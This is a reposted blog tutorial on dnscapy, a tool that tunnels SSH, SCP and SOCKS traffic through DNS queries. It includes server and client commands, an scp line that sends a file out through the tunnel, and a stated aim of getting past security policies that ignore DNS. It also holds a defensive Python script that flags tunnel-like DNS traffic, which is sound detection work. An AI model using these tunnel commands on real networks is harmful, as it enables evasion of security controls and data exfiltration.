
Using dnscapy: essentially an SSH proxy built over a DNS tunnel

git clone https://github.com/cr0hn/dnscapy.git

easy_install Scapy

On the server:

python dnscapy_server.py a.friendsxxx.com 45.77.39.xxx

On the client:

ssh -o ProxyCommand="sudo python dnscapy_client.py a.friendsxxx.com 45.77.39.xxx" [email protected]

Here a.friendsxxx.com is the domain of my DNS tunnel, and 45.77.39.xxx is the IP of my DNS name server (all resolution for a.friendsxxx.com is delegated to 45.77.39.xxx). Note that in the README's usage below the client's second argument is [IP_ADDR_OF_CLIENT_DNS], the resolver the client sends its queries to; pointing the client straight at the authoritative server, as done here, works when that IP is reachable, but the queries then bypass the local recursive resolver, which is the path a tunnel has to traverse in a network where direct outbound traffic is blocked.

After that, SSH is reachable through the tunnel.

File transfer:

scp -o ProxyCommand='sudo python dnscapy_client.py a.friendsxxx.com 45.77.39.xxx' wanted_file [email protected]:/tmp/

Packet capture analysis:

sudo tcpdump -i enp0s3 port 53 -w ~/dns_tunnel_tool/dnscapy/dnscapy_ssh.pcap

Open the capture in Wireshark:

You can see what the transferred data looks like: the SSH stream is carried in the query names and in CNAME/TXT answers.
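As an added example (not code from this post or from the dnscapy project), the following Python script decodes DNS query packets of the kind the capture above contains and scores each zone for tunnel indicators: long, high-entropy leading labels, and a high share of TXT/CNAME queries, the record types dnscapy uses. The packets are constructed inline with a small builder rather than read from a pcap; the zone a.friendsxxx.com is reused only as sample data, and the thresholds are assumptions chosen for the illustration, not values from the page or the tool.

```python
"""Decode raw DNS queries and flag zones that look like a DNS tunnel.

Added example, not part of dnscapy. Parses the DNS wire format directly so it
runs offline; in practice the packets would come from the tcpdump capture.
"""
import math
import struct
from collections import defaultdict

QTYPES = {1: "A", 5: "CNAME", 16: "TXT", 28: "AAAA"}


def build_query(qname: str, qtype: int, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS query (header + one question). Used only to
    construct sample input for this example."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    name = b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in qname.rstrip(".").split("."))
    return header + name + b"\x00" + struct.pack("!HH", qtype, 1)  # IN class


def parse_query(pkt: bytes):
    """Return (qname, qtype_name) for the first question in a DNS packet."""
    _txid, _flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, off = [], 12
    while True:
        ln = pkt[off]
        if ln == 0:
            off += 1
            break
        if ln & 0xC0:  # compression pointers never appear in a question name
            raise ValueError("unexpected compression pointer")
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii", "replace"))
        off += 1 + ln
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    return ".".join(labels), QTYPES.get(qtype, str(qtype))


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload scores far above hostnames."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def analyze(packets, zone_labels=2):
    """Group queries by zone (last `zone_labels` labels, an assumption that is
    good enough for .com-style names) and compute per-zone indicators."""
    per_zone = defaultdict(list)
    for pkt in packets:
        qname, qtype = parse_query(pkt)
        labels = qname.split(".")
        per_zone[".".join(labels[-zone_labels:])].append(
            (".".join(labels[:-zone_labels]), qtype))
    stats = {}
    for zone, items in per_zone.items():
        n = len(items)
        subs = [s for s, _ in items]
        stats[zone] = {
            "queries": n,
            "mean_sub_len": sum(map(len, subs)) / n,
            "mean_entropy": sum(shannon_entropy(s.replace(".", "")) for s in subs) / n,
            "txt_cname_frac": sum(t in ("TXT", "CNAME") for _, t in items) / n,
        }
    return stats


def suspicious_zones(packets, min_queries=3):
    """Zones whose subdomains carry encoded payload or lean on TXT/CNAME.
    Thresholds are illustrative assumptions, not tuned values."""
    flagged = []
    for zone, s in analyze(packets).items():
        if s["queries"] < min_queries:
            continue
        encoded_payload = s["mean_sub_len"] >= 30 and s["mean_entropy"] >= 3.5
        odd_rrtypes = s["txt_cname_frac"] >= 0.5 and s["mean_sub_len"] >= 20
        if encoded_payload or odd_rrtypes:
            flagged.append(zone)
    return sorted(flagged)


# Constructed sample traffic (not a real capture): four ordinary lookups and
# four dnscapy-style queries whose leading label carries encoded data.
SAMPLE_PACKETS = [
    build_query("www.example.com", 1),
    build_query("mail.example.com", 28),
    build_query("cdn.example.com", 1),
    build_query("www.github.com", 1),
    build_query("7g3kq9xz2mbv4n8p0rtw5y1hds6jlfc.a.friendsxxx.com", 5),
    build_query("q8w2e4r6t0y1u3i5o7p9a1s2d3f4g5h6.a.friendsxxx.com", 16),
    build_query("zxcvbnmasdfghjklqwertyuiop123456.a.friendsxxx.com", 5),
    build_query("m1n2b3v4c5x6z7l8k9j0hgfdsapoiuyt.a.friendsxxx.com", 16),
]

if __name__ == "__main__":
    for zone, s in analyze(SAMPLE_PACKETS).items():
        print(zone, s)
    print("suspicious:", suspicious_zones(SAMPLE_PACKETS))
```

Run against a real capture, the same per-zone statistics would be fed from the QNAME/QTYPE columns Wireshark shows for the session; the point of the example is that the tunnel is visible from the names and record types alone, without decoding the payload.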

DNScapy is a DNS tunneling tool. The code is very light and written in Python. It includes a server and a client. The server can handle multiple clients.

DNScapy creates an SSH tunnel through DNS packets. SSH connections, SCP and a SOCKS proxy (ssh -D) are supported. You can use CNAME records or TXT records for the tunnel. The default mode is RAND, which uses both CNAME and TXT at random.

DNScapy is still under development. The current version is 0.99b and seems to work pretty well. Feel free to clone and test it!

Software Requirements

Note: once Scapy is installed, you have to patch a missing import.

Hardware Requirements

To make a real DNS tunnel, you will need:

Here is a very short guide:

On the server:

sudo python dnscapy_server.py [DELEGATED_ZONE_NAME] [EXTERNAL_IP_ADDR]

On the client:

ssh -o ProxyCommand="sudo python dnscapy_client.py [DELEGATED_ZONE_NAME] [IP_ADDR_OF_CLIENT_DNS]" yourlogin@localhost

Help and options:

./dnscapy_client.py -h

./dnscapy_server.py -h

It will not work if both client and server are on localhost. If you want to test it on the same computer, I suggest using a virtual machine.

Why make a DNS tunnel?

Because in most cases a security policy takes care of HTTP and forgets DNS. Let's consider two common situations:

In general, nothing is done to control DNS resolution. Therefore you can get around both of the previous restrictions by making a DNS tunnel.

DISCLAIMER: We are not responsible at all for misuse of DNScapy. Bypassing a security policy is forbidden. Please use DNScapy only for test purposes, in order to detect potential security holes in your own network.

Why an SSH tunnel through DNS?

This article is reposted from 张昺华-sky's cnblogs blog; original link: http://www.cnblogs.com/bonelee/p/8037761.html. Contact the original author for permission to republish.